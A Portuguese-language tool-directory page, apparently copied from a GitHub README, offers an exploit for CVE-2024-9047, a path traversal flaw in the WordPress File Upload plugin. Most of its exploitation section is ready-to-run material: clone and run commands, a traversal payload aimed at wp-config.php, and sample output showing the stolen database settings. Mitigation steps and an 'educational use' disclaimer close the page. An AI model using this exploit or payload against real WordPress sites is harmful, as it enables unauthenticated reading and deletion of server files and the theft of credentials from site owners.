Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-9047-Exploit — Exploit para o Plugin de Upload de Arquivos do WordPress - Todas as versões até 4.24.11 são vulneráveis. | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2024-9047-exploit
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoAprendizado e Educação
GitHubnxploited/cve-2024-9047-exploit

CVE-2024-9047-Exploit

Exploit para o Plugin de Upload de Arquivos do WordPress - Todas as versões até 4.24.11 são vulneráveis.

Ver Repositório
41há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-9047: Exploit para Plugin de Upload de Arquivos WordPress

Descrição

O plugin WordPress File Upload para WordPress é vulnerável a uma vulnerabilidade de Path Traversal em todas as versões até, e incluindo, 4.24.11 através do arquivo wfu_file_downloader.php. Essa vulnerabilidade permite que atacantes não autenticados leiam ou excluam arquivos fora do diretório pretendido. A exploração bem-sucedida requer que a instalação do WordPress alvo esteja rodando PHP 7.4 ou anterior.

Impacto

  • Severidade: Crítica
  • Pontuação CVSS: 9.8 (Crítica)
  • Vetor de Ataque: Rede
  • Autenticação Necessária: Não

Exploração

Um atacante pode explorar essa vulnerabilidade criando uma requisição específica para o endpoint vulnerável, wfu_file_downloader.php, e manipulando o parâmetro de caminho do arquivo para obter acesso não autorizado a arquivos sensíveis no servidor.


Detalhes do Exploit

Requisitos

  • A instalação do WordPress alvo deve ter o plugin vulnerável instalado (4.24.11 ou anterior).
  • O servidor deve executar a versão PHP 7.4 ou anterior.

Passos para Explorar

  1. Clone este repositório:

    root@kitploit:~
    git clone https://github.com/Nxploited/CVE-2024-9047-Exploit.git
    cd CVE-2024-9047-Exploit
    
  2. Instale as dependências Python (se necessário):

    root@kitploit:~
    pip install requests
    
  3. Execute o script para verificar a versão do plugin e explorar a vulnerabilidade:

    root@kitploit:~
    python3 CVE-2024-9047.py --url http://target-site.com --command /../../../../../path/to/target/file
    

Exemplo de Uso

Para explorar a configuração vulnerável padrão e ler o arquivo de configuração do WordPress:

root@kitploit:~
python3 CVE-2024-9047.py --url http://192.168.1.100 --command /../../../../../opt/lampp/htdocs/wordpress/wp-config.php

Resultado

root@kitploit:~
C:\Users\Nxploit\Desktop\-C>python CVE-2024-9047.py -u http://192.168.100.74:888/wordpress/
Detected version: "trunk"
The site is vulnerable!
Exploit successful! Response:
<?php

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress7' );

/** Database username */
define( 'DB_USER', 'root' );

/** Database password */
define( 'DB_PASSWORD', '' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+


Mitigação

Para proteger seu site WordPress:

  1. Atualize o plugin WordPress File Upload para a versão mais recente.
  2. Certifique-se de que a versão do PHP seja atualizada para uma versão suportada (superior a 7.4).
  3. Restrinja as permissões de arquivo para evitar acesso não autorizado a arquivos sensíveis.
  4. Use um Firewall de Aplicação Web (WAF) para bloquear requisições maliciosas.

Aviso Legal

Este código é destinado apenas para fins educacionais e de pesquisa. O uso não autorizado deste script em sistemas que você não possui ou sem permissão explícita para testar é ilegal e antiético. Os autores não assumem responsabilidade por qualquer uso indevido deste código.

Baixar ferramenta